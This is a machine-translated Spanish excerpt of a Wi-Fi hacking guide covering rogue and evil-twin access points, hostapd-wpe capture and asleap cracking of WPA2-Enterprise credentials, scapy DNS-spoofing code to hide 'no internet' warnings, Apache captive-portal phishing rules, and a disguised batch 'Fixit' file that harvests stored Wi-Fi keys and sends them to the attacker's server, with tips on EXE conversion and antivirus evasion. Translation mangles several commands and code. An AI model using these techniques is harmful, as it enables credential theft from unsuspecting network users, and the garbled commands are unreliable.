[Link] [Link]
[Link] [Link]
[Link] [Link]
[Link] [Link]
Si se conecta con frecuencia a su punto de acceso móvil y también desea conectar las máquinas cercanas, debe
tener lista la configuración de wpa_supplicant .
Después de matar al administrador de red, aún puede conectarse a Wi-Fi AP usando la utilidad wpa_supplicant .
red={
ssid="rootsh3ll"
#psk="iamrootsh3ll"
psk=1f4b02fe4c82f4e0262e6097e7bad1f19283b6687f084f73331db86c62498b40
}
Esa es toda la configuración que necesita conservar para ahorrar tiempo y esfuerzo. ¿Cómo usarlos con la
configuración de AP falso? Lo descubriremos en el próximo capítulo.
Profundicemos en la mecánica de un AP falso
126
Machine Translated by Google
7
Punto de acceso no autorizado:
Pero esa no es una historia habitual en un entorno corporativo. ¿Por qué? Empresa WPA2
WPA2 Enterprise (no Personal) brinda la seguridad necesaria para redes inalámbricas en entornos comerciales
donde se implementa un servidor RADIUS.
central para autenticar a los usuarios de acceso telefónico y autorizar su acceso al sistema o servicio solicitado.
RADIUS permite que una empresa mantenga perfiles de usuario en una base de datos central que todos los
servidores remotos pueden compartir. Proporciona una mejor seguridad, lo que permite a una empresa configurar una
política que se puede aplicar en un único punto de red administrado.
127
Machine Translated by Google
Introducción
Las variantes Enterprise de WPA y WPA2, también conocidas como 802.1x, utilizan un servidor RADIUS para fines
de autenticación. La autenticación se logra utilizando variantes del EAP protocolo. Esta es una configuración más
compleja pero más segura.
La diferencia clave entre WPA y WPA2 es el protocolo de cifrado utilizado. WPA utiliza el
TKIP mientras que WPA2 introduce soporte para CCMP protocolo.
De forma predeterminada, hostapd no admite el ataque de suplantación de identidad WPA/2 Enterprise. Aquí viene
hostapd-wpe (Wireless Pwnage Edition), un parche para hostapd para facilitar los ataques de suplantación de puntos
de acceso.
Implementa ataques de suplantación de identidad del servidor de autenticación y del autenticador IEEE 802.1x para
obtener las credenciales del cliente, establecer la conectividad con el cliente y lanzar otros ataques cuando
corresponda.
hostapd-wpe admite los siguientes tipos de EAP para la suplantación:
1. EAP-FAST/MSCHAPv2 (Fase 0)
2. PEAP/MSCHAPv2
3. EAP-TTLS/MSCHAPv2
4. EAP-TTLS/MSCHAP
5. EAP-TTLS/CHAP
6. EAP-TTLS/PAP
Una vez que la suplantación esté en marcha, hostapd-wpe devolverá un mensaje EAP-Success para que el cliente
crea que está conectado a su autenticador legítimo.
Es necesario que hostapd ya esté instalado para aplicar el parche hostapd-wpe, por supuesto.
Instalación:
actualización adecuada
Enumere el contenido de /etc/ hostapd-wpe/. Verá un archivo de configuración ([Link]) y una carpeta
llamada certs. Que contiene certificados implementados.
ls -l /etc/hostapd-wpe/
128
Machine Translated by Google
total 96
drwxr-xr-x 3 raíz raíz 4096 4 de abril 03:15 certs -rw-r--r-- 1 raíz raíz
83968 12 de noviembre 15:40 [Link] -rw-r--r-- 1 raíz raíz 4573 12 de
noviembre 15:40 hostapd-wpe.eap_user
Ahora, puede editar el archivo [Link] para realizar cambios según sus necesidades. Simplemente
cambiaré el SSID, por el bien de la prueba.
vi /etc/hostapd-wpe/[Link]
Nombre de PID
hostapd-wpe /etc/hostapd-wpe/[Link]
clave:
129
Machine Translated by Google
Después de que la víctima haga clic en "Unirse", tendrá que confiar en el certificado proporcionado por hostapd-wpe.
Tan pronto como la víctima confíe en el certificado, obtendrá algo similar en la pantalla hostapd-wpe:
desafío: [Link]
respuesta: [Link]
jtr NETNTLM:
usuario de prueba: $NETNTLM$c8442f7b85620440$685adf105780a337b9a00e8bb379283ea34053d73f02f842
wlan0: STA [Link] IEEE 802.11: desasociado
wlan0: STA [Link] IEEE 802.11: desautenticado debido a inactividad (temporizador DEAUTH/REMOVE)
Presiona Ctrl-C para detener el ataque y pasar al siguiente paso, fuerza bruta.
Para la demostración, estoy usando la lista de palabras rockyou preinstalada en Kali Linux.
Copie toda la información requerida, es decir
Rompe el hachís
zcat /usr/share/wordlists/[Link] | dormido -C c8 :44:2f:7b:85:62:04:40 -R
[Link] -W -
Desglose de comandos:
zcat: Extrae el contenido comprimido de la lista de palabras [Link] en STDIN.
'|': El operador de tubería pasa la salida de zcat como entrada estándar a asleap (- W -)
dormido: toma el desafío (-C) y la respuesta (-R) junto con la lista de palabras (-W) que se pasa como entrada estándar
(nota '-' después de -W).
130
Machine Translated by Google
35ccba9168b1d5ca6093b4b7d56c619b
clave: pase de prueba
ls /usr/share/wordlists/ -lh
total 51M
lrwxrwxrwx 1 root root 25 Nov 20 03:44 dirb -> /usr/share/dirb/wordlists lrwxrwxrwx 1 root root
30 Nov 20 03:44 dirbuster -> /usr/share/dirbuster/wordlists lrwxrwxrwx 1 root root 35 Nov 20 03:44 [Link]
-> /usr/share/dnsmap/wordlist_TLAs.txt lrwxrwxrwx 1 raíz raíz 41 20 de noviembre 03:44 [Link] -> /usr/share/
set/src/fasttrack/[Link] lrwxrwxrwx 1 root root 45 20 de noviembre 03:44 fern-wifi -> /usr/share/fern-wifi-cracker/extras/
wordlists lrwxrwxrwx 1 root root 46 20 de noviembre 03:44 metasploit -> /usr/share/metasploit-framework/data /wordlists
lrwxrwxrwx 1 raíz raíz 41 20 de noviembre 03:44 [Link] -> /usr/share/nmap/nselib/data/[Link] -rw-r--r-- 1 raíz raíz 51M 3
de marzo de 2013 [Link] .gz lrwxrwxrwx 1 raíz raíz 34 20 de noviembre 03:44 [Link] -> /usr/share/sqlmap/txt/[Link]
lrwxrwxrwx 1 raíz raíz 25 de noviembre 20 03:44 wfuzz -> /usr/share/wfuzz/wordlist
Consulte el menú de ayuda de hostapd-wpe para descubrir nuevas posibilidades, simplemente ejecute
hostapd-wpe
hostapd-WPE v2.6
Daemon de espacio de usuario para gestión de AP IEEE
802.11, autenticador IEEE 802.1X/WPA/WPA2/EAP/RADIUS
Copyright (c) 2002-2016, Jouni Malinen <j@[Link]> y colaboradores
-------------------------------------------------- ---
131
Machine Translated by Google
Introducción
No es difícil suponer que durante las pruebas de penetración inalámbricas, las personas terminan teniendo solo una
NIC de Wi-Fi y, a veces, tienen dificultades para acceder a la red inalámbrica de destino, gracias a WPA2.
Una alternativa, como vimos anteriormente, es llevar a la víctima a su punto de acceso falso
desautenticándolo del original.
Pero, eso es un mundo completamente nuevo en sí mismo. Un montón de situaciones que debes abordar y descubres
que las herramientas no están diseñadas para luchar contra todas ellas. Por lo tanto, es esencial para usted, un probador
de penetración, comprender la mecánica y tener en sus manos las herramientas directamente y arreglarlas según lo
exija el escenario.
Un problema principal con el punto de acceso falso es proporcionar acceso a Internet. Es fundamental prever
para que la víctima no sospeche, desconecte y pierda a su presa.
Anteriormente, aprendimos a brindar acceso a Internet a la víctima cuando nosotros mismos estamos conectados
a través de Ethernet directamente o Wi-Fi en el host (ethX en VM). En ambos casos, o estamos atascados con un cable
físico o necesitamos otra tarjeta Wi-Fi para realizar tareas como:
1. Conexión a un punto de acceso
2. Desautenticación, o
3. Unir las interfaces
Ambos casos no resuelven nuestro problema de ser remotos, atascados con una sola NIC, también conocido
como modo de supervivencia. Pero necesitamos desesperadamente piratear la computadora de la víctima/
teléfono inteligente / tableta, lo que sea.
Engañando a su kernel de Linux para que cree interfaces de software con una tarjeta inalámbrica física y utilícelas como
una entidad separada con algunas limitaciones o, en términos simples, creando interfaces virtuales.
“El subsistema nl80211 en el kernel de Linux admite la creación de múltiples interfaces inalámbricas con una
tarjeta inalámbrica física. Esto depende del controlador que implemente esto. Esto podría permitirle unirse a varias
redes a la vez o conectarse a una red mientras enruta el tráfico desde una interfaz de punto de acceso”.
132
Machine Translated by Google
MENTE = *SOPLADO*
Usando la utilidad iw , incluida en casi todas las distribuciones de Linux. Pero aquí está la cosa,
No todas las tarjetas admiten la virtualización de interfaz. Ni siquiera mi Alfa AWUS036NH lo soporta por completo.
Pero una TP-LINK TL-WN722N (tarjeta Atheros) más económica sí lo admitió por completo.
* vigilar
Una cadena similar en la salida de su lista iw significa que puede crear interfaces virtuales con esa tarjeta.
Pero eso no es suficiente,
también debe verificar las posibles combinaciones de interfaz con la tarjeta. Consulte el resultado de la lista iw en la
sección de combinaciones de interfaz válidas :
Desglose de salida:
#{administrado, cliente P2P} <= 2 : Como máximo 2 interfaces gestionadas (modo cliente) posibles
#{ AP, punto de malla, P2P-GO } <= 2 : se pueden crear un máximo de 2 Aps simultáneamente
totales <= 2: Como dice, se pueden usar un máximo de dos interfaces activas
#canales <= 1: Este es complicado, déjame explicarte. Un Wi-Fi es, en última instancia, una radio.
Una radio puede funcionar en un canal o frecuencia fijos (por ejemplo, 2437 MHz)
en un momento determinado. Por lo tanto, los canales son <= 1 significa que no es
posible usar la tarjeta en más de un canal/frecuencia
en cualquier momento dado.
¿Como arreglarlo?
Ahora que ha verificado que su tarjeta es compatible con la virtualización de interfaz. Vamos a llegar
133
Machine Translated by Google
en la practicidad de la misma.
Hardware utilizado
• Igual que antes
Software utilizado:
Empecemos,
134
Machine Translated by Google
Baje la interfaz real para minimizar los problemas y active wlan-sta para escanear el aire
Verifique el número de canal del punto de acceso al que se conectaría. En mi caso, rootsh3ll
escanear iw wlan-sta
Le mostrará una salida de novela larga que le gustaría formatear para obtener resultados específicos. Hagamos un grep
de la salida filtrada por SSID y sus números de canal correspondientes.
SSID: raícesh3ll
* canal principal: 1
SSID: Airtel
* canal principal: 1
SSID: Ravinder *
canal principal: 8
Desglose de comandos:
escanear iw wlan-sta: Escanea el aire usando la interfaz wlan-sta
grep -i “ssid\|canal principal:”: cadena grep ssid y canal principal: ignorando el caso (-i).
Tenga en cuenta que el SSID en mayúscula es una cadena diferente sin el indicador -i
135
Machine Translated by Google
gato [Link]
red={ ssid="rootsh3ll"
#psk="iamrootsh3ll"
psk=1f4b02fe4c82f4e0262e6097e7bad1f19283b6687f084f73331db86c62498b40
}
Desglose de comandos:
wpa_supplicant: Utilidad utilizada para conectarse a la red WPA2
-D: Controlador a utilizar, es decir, nl80211
-i: Nombre de la interfaz
Abra una nueva terminal y solicite a rootsh3ll que asigne la dirección IP a wlan-sta
dhclient wlan-sta
Suponiendo que haya realizado cambios en su archivo [Link] para el número de canal actual.
136
Machine Translated by Google
Encienda el AP no autorizado
Ejecute hostapd
hostapd /etc/hostapd/[Link] Archivo
de configuración: [Link] Uso de la
interfaz wlan-ap con hwaddr [Link] y ssid "rsX" wlan-ap: estado de la interfaz
SIN INICIALIZAR->HABILITADO wlan-ap: AP-HABILITADO
Asigne una dirección IP de clase A ([Link]) a la interfaz wlan-ap , que se encuentra en dhcp-range en dnsmasq
ifconfig wlan-ap [Link]
Ejecute dnsmasq
dnsmasq -C [Link] -d
dnsmasq: iniciado, versión 2.76 tamaño de caché 150
dnsmasq: tiempo de compilación opciones: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP
conntrack ipset auth DNSSEC loop-detect inotify dnsmasq-dhcp: DHCP , rango de IP [Link] -- [Link],
tiempo de arrendamiento 12 h dnsmasq: usando el servidor de nombres [Link]#53 dnsmasq: leyendo /etc/
[Link] dnsmasq: leyendo /etc/hosts - 5 direcciones
Desglose de comandos:
-C: Archivo de configuración
-d: Habilitar el modo de depuración
137
Machine Translated by Google
Últimamente, es posible que tenga problemas con ataques AP no autorizados dirigidos. Un punto de acceso no
autorizado con un solo adaptador generalmente no tiene conexión a la WAN. Incluso si crea una interfaz virtual, hay
un cambio: no tiene una fuente de Internet activa. Por lo tanto, no hay Internet para el cliente, lo que puede causar
serias sospechas y hacer que el cliente se desconecte de su punto de acceso falso.
No se trata solo del cliente, ya sea una tableta o un teléfono móvil, los dispositivos son inteligentes hoy en día.
Mediante una simple solicitud HTTP GET , es más fácil verificar la accesibilidad a Internet. Pero, como hacker
de Wi-Fi, no quieres que tu víctima sepa esto.
¿Por qué?
La advertencia "Sin acceso a Internet" molesta a los usuarios/dispositivos, lo que hace que se desconecten.
Definitivamente no quieres perder en tu objetivo.
Sí, este es un "error" común y normal cuando se trata de este tipo de ataque y hasta ahora casi nadie le ha
prestado atención.
Para resumir, el error "Sin acceso a Internet" tuvo que ser eliminado.
138
Machine Translated by Google
Antes de saltar a la teoría, observemos qué solicitudes realiza nuestra máquina de destino justo
después de conectarse al punto de acceso.
Sistema de destino: Windows 7 y Windows 10
Abrir Wireshark (como raíz):
Después de un tiempo con Wireshark, noté que después de cada conexión, hay solicitudes
de DNS para [Link] y una para el archivo [Link] .
Windows realiza una operación en segundo plano cada vez que se activa una interfaz, Microsoft
Método de indicador de estado de conectividad de red (también conocido como NCSI) que también se puede ver en el registro:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NlaSvc\Parameters\Internet
139
Machine Translated by Google
Como puede ver, el registro de win10 incluye todas las entradas de win7 y algunas otras, así que concentrémonos en una de
win10.
Recomendaciones:
• Con un punto de acceso no autorizado sin acceso a la WAN, todos los criterios de NCSI fallan.
Lo que debemos hacer es suplantar las respuestas a las solicitudes necesarias para cumplir con los criterios de NCSI.
Hay mucho código que no explicaré, ¿por qué? Porque es sencillo. Si tiene alguna pregunta, puede unirse/iniciar un hilo en el
Después de verificar que el paquete es una solicitud de DNS, primero nos ocuparemos de los paquetes ipv4 (tipo A).
140
Machine Translated by Google
UDP (dport = paquete [UDP] .sport, sport = paquete [UDP] .dport) / \ DNS
(id = paquete [DNS] .id, qr = 1, aa = 1, qd = paquete [DNS] .qd, \ an =
DNSRR (rrname = pkt [DNS] .[Link], ttl = 64, rdata = '[Link]')) del pkt [IP] .chksum del
pkt [UDP] .chksum
sendp(spoofed_pkt,iface='at0') print('Envío
de respuesta falsificada:') spoofed_pkt.show2()
Ahora Windows no tiene definida la dirección [Link]/ [Link] , por lo que podemos alojarla fácilmente en
nuestro servidor apache y falsificar la solicitud de DNS para [Link] a la máquina atacante con
[Link] o dnsspoof de dnsmasq
.tipo)/\
IP (dst = pkt [IP] .src, src = pkt [IP] .dst) / \ UDP (dport =
pkt [UDP] .sport, sport = pkt [UDP] .dport) / \ DNS (id = pkt [ DNS] .id, qr
= 1, aa = 1, qd = pkt [DNS] .qd, \ # [Link] debe estar sintonizado con
GW para dhcp an = DNSRR (rrname = pkt [DNS] .[Link], ttl = 64,
rdata = '10 .0.0.254 ')) del paquete [IP] .chksum del paquete [UDP] .chksum
sendp(spoofed_pkt,iface='at0') print('Envío
de respuesta falsificada:') spoofed_pkt.show2()
sendp(spoofed_pkt,iface='at0') print('Envío
de respuesta falsificada:') spoofed_pkt.show2()
141
Machine Translated by Google
Cree un archivo .txt con contenido "Microsoft NCSI" (sin comillas) en el directorio raíz de apache (var/www/
html)
Asumiendo la interfaz en 0
Buscando...
NOTA: Este script está escrito para at0, si está usando hostapd como su software de punto de acceso con wlan0,
use [Link].
Si usa interfaces virtuales, simplemente busque y reemplace todo at0 con wlan-ap (o el nombre de su interfaz AP) en
[Link]. Funcionará bien. No olvide activar la interfaz antes de ejecutar [Link].
¿Resultados?
Como puede ver en las imágenes a continuación, después de colocar [Link] en el lugar correcto y ejecutar nuestro
script, ya no hay más errores de "Sin acceso a Internet":
142
Machine Translated by Google
En planes…
Se puede hacer lo mismo para MAC y otros iDevices, que usan el mismo protocolo. Algunos Mac e iDevices se
desconectan de los AP sin conexión a WAN, por lo que sería útil.
Hackear información de un iDevice es simplemente dulce. Lo haré tarde o temprano ;)
143
Machine Translated by Google
8
Portales cautivos
En teoria
¿Alguna vez se preguntó cómo su dispositivo sabe mágicamente sobre la disponibilidad de la conexión a Internet?
¿Cómo sabe que necesita iniciar sesión en el navegador para acceder a Internet? ¿Cómo sabe siquiera la
dirección donde se encuentra el formulario de inicio de sesión?
Bueno, si está observando todos estos comportamientos con la lente de un hacker, probablemente tendrá
una pequeña idea de lo que está sucediendo o su mente podría comenzar a dar vueltas cuando vea lo fácil
que es preparar su honeypot y ver las abejas. (víctimas)
ellos mismos dándote toda la miel (creds!). Esto se llama Portal Cautivo.
Un portal cautivo es cuando, después de conectarse a Wi-Fi, cualquier solicitud web que realice se redirige
a una página de inicio de sesión/ToS. Para continuar, debe iniciar sesión con un nombre de usuario/
contraseña (o registrarse y luego iniciar sesión) y/o acceder a los Términos de servicio.
144
Machine Translated by Google
Introducción
Cada vez que vaya a Starbucks, aborde un tren de metro o su plan de Internet caduca. Inmediatamente después de conectar Wi-
Fi en su dispositivo móvil, debe haber notado que apareció una pantalla de inicio justo sobre su pantalla, pidiéndole que inicie
sesión.
Operativo (SO) del dispositivo cliente (teléfono inteligente, tableta, computadora portátil).
Simplemente intenta llegar a una URL específica y verificar que dicha URL devuelve un resultado conocido.
Todos los sistemas operativos móviles simplemente revisan una página web para decidir si están detrás de un portal cautivo o
no.
145
Machine Translated by Google
El mecanismo es este:
OBTENER/POST [Link]
Si [Link] == [contenido esperado] > Abrir Internet
Si [Link] != [contenido esperado] > Portal cautivo
Si [Link][estado] != ÉXITO > Sin red
Si no hay un portal cautivo, el resultado coincidirá con el esperado y el sistema operativo sabrá que hay
acceso total a Internet.
Si la URL devuelve un resultado diferente al esperado, entonces el sistema operativo detectará que existe un
portal cautivo y que es necesario continuar con la autenticación para obtener acceso completo a Internet: en
este caso, el sistema operativo abrirá el Página de bienvenida automáticamente.
146
Machine Translated by Google
ventanas
• [Link]
• [Link]
Microsoft usa direcciones IPv4 e ipv6 codificadas para hacer coincidir la respuesta de la solicitud para verificar la
conexión a Internet. Aunque se puede falsificar por disponibilidad o no disponibilidad con bastante facilidad.
• [Link]/[Link]
• [Link]/test/[Link]
WISPr (pronunciado "susurro") o roaming del proveedor de servicios de Internet inalámbrico utilizado por cada
Dispositivo Apple para detección de portales cautivos. Esta tecnología permite a los usuarios moverse entre
proveedores de servicios de internet inalámbrico de una manera similar a la que permite a los usuarios de teléfonos
celulares moverse entre operadores.
Otra pregunta es si se trata de un vector de ataque. La respuesta es probablemente si". Hay más en la funcionalidad
que una simple solicitud HTTP. Si busca la palabra clave "wispr" en la cadena User-Agent en los registros de apache,
descubrirá por qué.
La idea es que los portales Wi-Fi inteligentes detecten que se trata de un dispositivo compatible con WISPr y envíen
un mensaje WISPr en XML. Esto permite que los iDevice(s) inicien sesión con las credenciales almacenadas en
caché a través de otro mensaje XML. Esto significa, por ejemplo, que podría obtener las credenciales de alguien con
un punto de acceso Wi-Fi configurado correctamente.
Cuando un iDevice se conecta a una red Wi-Fi, lo primero que hace es realizar una solicitud a la URL [Link]
o [Link]/ test/ [Link].
Con iOS 7 en adelante, Apple comenzó a usar el agente de usuario "CaptiveNetworkSupport", aunque no es tan
común como el método de URL que usan Android y Windows.
La razón por la que Apple hace esto es porque puede estar usando una aplicación que no sea el navegador web.
Por ejemplo, lo único que podría estar haciendo es sincronizar su correo electrónico. En tales situaciones, la redirección
automática no funcionaría, ya que no hay ningún navegador en uso y nunca vería el portal.
147
Machine Translated by Google
Por lo tanto, antes de que su aplicación tenga la oportunidad de acceder a la red, Apple lo hace por
usted. Envía una solicitud a la URL anterior. Si la solicitud se redirige, entonces Apple sabe que hay
un portal. Luego abre un cuadro de diálogo, que contiene Safari, para darle la oportunidad de iniciar
sesión.
Al leer los registros de apache (/ var/ logs/ apache2/ [Link]) para dispositivos Apple, verá algo
como esto:
148
Machine Translated by Google
en el mundo real
A partir de aquí, las posibilidades de post-explotación con un portal cautivo activo son ilimitadas.
Exploraremos algunos de ellos en el próximo capítulo.
Mod_rewrite de Apache ofrece una potente funcionalidad que podemos aprovechar para fortalecer nuestras campañas de
phishing. mod_rewrite procesa solicitudes y atiende recursos según un conjunto de reglas configurado en el archivo de
configuración del servidor o un archivo htaccess ubicado en el directorio web deseado. Para obtener valor de los usuarios
móviles que hacen clic en enlaces de phishing, podemos redirigir a esos usuarios a un sitio web malicioso compatible con
dispositivos móviles, como una captura de credenciales.
¿Qué es mod_rewrite?
mod_rewrite es un módulo de apache que proporciona un motor de reescritura basado en reglas para manipular las URL
solicitadas sobre la marcha. Las URL entrantes se comparan con una serie de reglas. Las reglas contienen una expresión
regular para detectar un patrón particular. Si el patrón se encuentra en la URL y se cumplen las condiciones adecuadas, el
patrón se reemplaza con una acción o cadena de sustitución proporcionada. Este proceso continúa hasta que no quedan
más reglas o se le indica explícitamente que se detenga.
Ventajas de mod_rewrite
Hay algunas ventajas obvias al usar una herramienta de reescritura de URL como esta, pero hay otras que pueden no
ser tan obvias.
mod_rewrite se usa más comúnmente para transformar URL crípticas y feas en lo que se conoce como URL "amigables" o
"limpias".
El módulo mod_rewrite es un motor de reescritura basado en reglas que permite a los administradores web
reescribir las URL a medida que se solicitan. Las reglas se evalúan de arriba hacia abajo y generalmente tienen
puntos de interrupción establecidos en todo momento. La escritura de reglas es un poco complicada al principio, al menos
lo fue para mí, por lo que para cada ejemplo en esta publicación, proporcionaré una explicación sobre lo que hace cada
regla 'en inglés'.
149
Machine Translated by Google
Definición de reglas
Las reglas se pueden configurar en el archivo de configuración de apache (ruta predeterminada de Debian de /
etc/apache2/[Link]) o en archivos .htaccess dentro de los directorios web. Ambos métodos son generalmente similares,
• Los archivos .htaccess evalúan las reglas según el directorio en el que residen (a menos que un
• Las reglas .htaccess se aplican a los subdirectorios, a menos que otro archivo .htaccess las anule
• Las reglas de .htaccess se pueden modificar sobre la marcha. Las reglas de configuración de apache requieren que apache2 sea
Las variables del servidor son útiles para escribir conjuntos de reglas complejas de mod_rewrite. Los siguientes están
Sintaxis de la regla
Las reglas de mod_rewrite pueden ser difíciles de entender al principio. Hay muchas variables, expresiones regulares y
especificidades para diferentes sintaxis. Las solicitudes se componen de algunos componentes clave a los que se hace
[Link]
http:// %{HTTP_HOST} / %{REQUEST_URI} ? %{QUERY_STRING}
Aquí hay un ejemplo simple de una regla con su descripción 'en inglés simple' a continuación:
reescriba la solicitud completa en [Link] y elimine cualquier cadena de consulta de la solicitud original.
Esta es una redirección temporal y la última regla que debe evaluarse/aplicarse a la solicitud.
Como puede ver, el conjunto de reglas contendrá una expresión condicional (RewriteCond) que, si es verdadera, realizará la
próxima RewriteRule. De forma predeterminada, el servidor evaluará varias cadenas RewriteCond como AND . Si desea que
150
Machine Translated by Google
[O] indicador al final de la línea RewriteCond. (La combinación de banderas se realiza con una coma - [NC, OR]).
Es importante tener en cuenta que cuando se analizan las reglas, se ejecuta la primera regla coincidente, similar a
las reglas de firewall. Asegúrese de colocar reglas más específicas más arriba en la lista.
Este conjunto de reglas coincidirá con cualquier usuario cuyo agente de usuario del navegador coincida con la expresión
regular de los navegadores móviles comunes y envíe la solicitud original al perfilador móvil codificado alojado en nuestro
servidor maligno. Todas las demás solicitudes se envían tal como están a nuestro servidor malvado.
Para reiterar un punto mencionado anteriormente, esto significa que los usuarios finales no verán la IP real de nuestro servidor
malvado, solo la que pertenece al servidor Apache.
Cambie toda la solicitud para servir 'MOBILE-PROFILER-PATH' desde la IP del atacante y mantenga la misma barra de
direcciones del usuario (oculte la IP del atacante ).
Si no se cumple la condición anterior, cambie toda la solicitud para servir la ruta de solicitud original desde la IP del
servidor maligno y mantenga la barra de direcciones del usuario igual (oculte la IP del servidor maligno ).
151
Machine Translated by Google
ErrorLog ${APACHE_LOG_DIR}/[Link]
CustomLog ${APACHE_LOG_DIR}/[Link] combinado </
VirtualHost>
Copie el archivo como [Link] para crear una regla de redirección para iDevices.
cp /etc/apache2/sites-enabled/000-default /etc/apache2/sites-enabled/[Link]
<Host virtual *: 80>
ServerAdmin webmaster@localhost
ServerName [Link]
DocumentRoot /var/www/html/apple
RewriteEngine en
RewriteCond %{HTTP_USER_AGENT} ^CaptiveNetworkSupport(.*)$ [NC]
Regla de reescritura ^(.*)$ [Link] [L,R=302]
ErrorLog ${APACHE_LOG_DIR}/[Link]
CustomLog ${APACHE_LOG_DIR}/[Link] combinados
/HostVirtual>
Copie el archivo como [Link] para crear una regla de redirección para dispositivos Android.
ServerAlias [Link]
ServerAlias [Link] ServerAlias
[Link] ServerAlias
[Link]
152
Machine Translated by Google
ServerAlias [Link]
ServerAlias [Link] ServerAlias
[Link]
Motor de reescritura en
Regla de reescritura ^/ generar_204 $ / generar_204 [R=204,L]
DocumentRoot /var/www/html/android
<Directorio />
Opciones FollowSymLinks
AllowOverride Ninguno
</Directorio>
ErrorLog ${APACHE_LOG_DIR}/[Link]
CustomLog ${APACHE_LOG_DIR}/[Link] combinados
</HostVirtual>
Desglose de parámetros:
FollowSymLinks: si un directorio es un enlace simbólico (acceso directo), siga el enlace
AllowOverride: All para permitir que .htaccess anule la configuración predeterminada del servidor, none para rechazar Índices:
un directorio se puede mostrar como una lista si no hay una página de índice.
Para dispositivos Android, debe crear un archivo negro (generate_204) en el directorio de Android de
Apache
cd /var/www/html/android toque
generar_204
Para dispositivos Android, deberá crear un archivo negro ([Link]) en el directorio de trabajo de apache
con el texto "Microsoft NCSI". Eso es lo que esperan los dispositivos Windows
cd /var/www/html/
echo “Microsoft NCSI” > [Link]
153
Machine Translated by Google
Nosotros /var/logs/apache2/[Link]
Encienda su punto de acceso falso y ahora está listo para probar su entorno. Pruebe y cree conciencia dentro de
su oficina, escuela, universidad donde sea que pueda.
154
Machine Translated by Google
9
AP falso definitivo
Visión de conjunto
Si practica, en esta etapa ahora debe ser capaz de configurar un punto de acceso no autorizado y configurar
la configuración de apache en consecuencia para engañar a las víctimas en su vector de ataque.
En este escenario, estamos usando un adaptador inalámbrico y una conexión ethernet (bajo VM)
para acceso a Internet opcional. También puede ejecutar este ataque perfectamente usando
interfaces virtuales sin problemas. Solo asegúrese de usar las interfaces apropiadamente.
Herramientas utilizadas:
• hostapd o airbase-ng
• dnsmasq o servidor isc-dhcp •
apache2
• editor de texto vi o nano
• agarre
• Salsa secreta
De todas las opciones anteriores, elijo las anteriores para configurar el escenario de ataque. También
puede elegir los últimos, dependiendo de su comodidad con las herramientas.
155
Machine Translated by Google
Ahora que tiene hostapd funcionando, necesitamos ejecutar un servidor dhcp que asignará
Si desea que el ataque se dirija hacia un sitio web o un cliente específico, también puede incluir [Link] para la
El motor de reescritura de Apache nos permite manipular solicitudes web sobre la marcha. Usando esta técnica,
Ya sea un dispositivo Android, iOS, una computadora con Windows o una Mac. Simplemente puede diseñar su servidor
web apache para atacar específicamente al tipo de objetivo. O incluso una versión específica del sistema operativo.
Diga un vector de ataque diferente para los clientes de iOS 9.x y diferente para los clientes de iOS 10. ¡Simplemente funciona!
Aquí nos dirigimos a la máquina con Windows porque tiene la base de instalación más amplia. Entonces, un objetivo bastante
Edite el archivo de configuración predeterminado de Apache para configurar la funcionalidad de reescritura. Esto redirigirá
casi cualquier URL, incluidos los subdirectorios, a nuestra página Fake AP.
156
Machine Translated by Google
nano /etc/apache2/sites-enabled/000-default
Tenga en cuenta que estamos agregando un directorio llamado /Fixit como excepción. Es sensible a mayúsculas y minúsculas.
<Directorio /var/www/>
Opciones Índices FollowSymLinks MultiViews
AllowOverride Ninguno
Solicite permiso ,
deniegue permiso de
todo RewriteEngine On
RewriteCond %{REQUEST_URI} !^/Fixit RewriteRule ^.*$ /
Fixit/ </Directory>
reescritura de a2enmod
Es posible que esto no sea lo que desea si está atacando dominios específicos junto con el acceso a Internet. En ese caso,
use el archivo [Link] con dnsmasq
Pero por ahora, no proporcionamos acceso a Internet a la víctima, sino que simplemente los pwn'em a todos. Entonces, ejecuta:
nuestra salsa secreta entrante para SSID/nombres de hasta 20 caracteres, tipo de autenticación AP y claves WLAN de 8-64 caracteres.
157
Machine Translated by Google
de registro>: Comando de cola con el parámetro -F con lectura de las últimas 10 líneas del archivo [Link], espera y
mostrar los datos tan pronto como se adjunten.
Tomar un descanso
Paso 6: Terminando
Cree un directorio llamado "Fixit" en /var/www/, ¡sensible a mayúsculas y minúsculas!
mkdir /var/www/Reparar
antivirus ni se verá afectado por ningún firewall. Si el navegador web funciona, esto funcionará.
@echo off
SET mypath=%~dp0
echo %random%-%random%.log > %temp%\tmpfile SET /p
filename=< %temp%\tmpfile del %temp%\tmpfile
@rem La siguiente línea es específica de la plataforma. A veces, en una carpeta diferente "c:
\Program Files\Internet Explorer\[Link]" [Link]/"!filecontent!"
158
Machine Translated by Google
Tan pronto como la víctima ejecuta el rastreador de claves Wi-Fi malicioso, abrirá Internet Explorer en el dispositivo de
la víctima con una URL que apunta a [Link] (nuestro servidor) con las claves Wi-Fi recolectadas dentro de la
URL.
Elegí URL porque es la forma más segura de enviar datos al servidor. El FTP podría bloquearse en algunas máquinas,
pero como la víctima descargó el archivo, significa que el navegador puede aprovecharse para la explotación.
Todo lo que necesita hacer es filtrar los datos por tipo de autenticación y el material clave (contraseña de Wi-Fi).
Filtramos eso en el paso 5, usando los comandos tail y grep
<nombre>rootsh3ll</nombre>
<autenticación>WPA2PSK</autenticación>
<keyMaterial>iamrootsh3ll</keyMaterial>
No hay necesidad de hacer nada extra. Todo está configurado, solo vea venir las credenciales.
Aquí hay algunas ideas que puede implementar si desea llevar este ataque un paso más allá:
1. Convertir lote a exe (con privilegios de administrador)
2. Comprima el archivo xml en un formato zip, luego
una. Codifique el archivo zip y envíelo a través de URL, como antes
b. Enviarlo por FTP
Descargo de responsabilidad: el antivirus puede activar los archivos EXE convertidos como un archivo malicioso y provocar su eliminación.
Omitir los AV es un tema completo en sí mismo. Para simplificar, este capítulo resonará en torno a un sistema sin AV instalado.
Bat to Exe Converter puede convertir archivos de script BAT (.bat) al formato EXE (.exe).
[Link] tiene un software realmente fácil de usar escrito para la conversión de batch2exe. Puede descargarlo y convertirlo
fuera de línea según su comodidad o convertirlo en línea y luego
descargar el archivo convertido.
159
Machine Translated by Google
Teniendo en cuenta que estamos ejecutando Kali Linux, pero el convertidor es un ejecutable de Windows. Por lo tanto,
primero debemos ejecutar el archivo en Linux.
WINE es un programa que permite que los programas desarrollados para Microsoft Windows se ejecuten en sistemas
